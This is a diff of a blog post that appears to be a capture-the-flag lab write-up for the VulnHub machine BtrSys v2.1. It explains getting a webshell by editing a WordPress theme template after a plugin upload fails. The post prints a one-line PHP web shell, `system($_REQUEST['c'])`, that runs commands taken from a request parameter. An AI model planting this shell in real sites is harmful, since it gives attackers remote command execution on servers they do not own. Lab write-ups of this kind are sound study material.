Ha-L0/Ha-L0.github.io/_posts/2023-08-13-[H4]-Proving-Grounds-Play-VULNHUB-BtrSys-v2.1.md

 > Trying to upload a standalone plugin to get a webshell fails, as the `wordpress` user does not seem to have permissions to write into the uploads folder.
 {: .prompt-danger }

-However, we can update the installed theme to get a webshell.
+However, we can update the installed and activated theme to get a webshell.

 > Therefore in the admin panel we navigate to `Appearance -> Editor -> Main Index Template (on the right)` {: .prompt-info }

-We add the following line and save.
+We add the following line and save the template.
 ```php
 system($_REQUEST['c']);
 ```